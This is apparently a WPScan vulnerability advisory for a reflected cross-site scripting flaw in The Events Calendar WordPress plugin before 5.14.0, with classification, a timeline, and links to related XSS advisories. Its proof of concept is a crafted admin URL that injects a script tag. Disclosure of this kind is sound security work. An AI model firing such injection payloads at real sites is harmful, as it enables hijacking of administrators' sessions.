WordPress Plugin Vulnerabilities

The Events Calendar < 5.14.0 - Reflected Cross-Site Scripting

Description

The plugin does not escape an aggregator URL before outputting it back in an attribute, leading to Reflected Cross-Site Scripting

Proof of Concept

When there is an Event Aggregator license key active:

https://example.com/wp-admin/edit.php?page=tribe-common&tab=imports&post_type=tribe_events&"><script>alert(/XSS/)</script>

Affects Plugins

Plugin icon
the-events-calendar
Fixed in 5.14.0

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
533f213b-9fb7-47da-a42c-780aea3aee11

Timeline

Publicly Published
2022-02-15 (about 2 years ago)
Added
2022-06-07 (about 1 years ago)
Last Updated
2022-06-07 (about 1 years ago)

Other

Published
Title
Published
2022-02-07
Title
White Label MS < 2.2.9 - Reflected Cross-Site Scripting
Published
2024-04-26
Title
WP ULike < 2.7.0 - Authenticated (Subscriber+) Stored Cross-Site Scripting
Published
2023-03-10
Title
GiveWP < 2.25.2 - Author+ Stored Cross-Site Scripting
Published
2023-11-07
Title
Atarim < 3.13 - Unauthenticated Stored XSS
Published
2023-05-25
Title
Video Contest WordPress <= 3.2 - Admin+ Stored XSS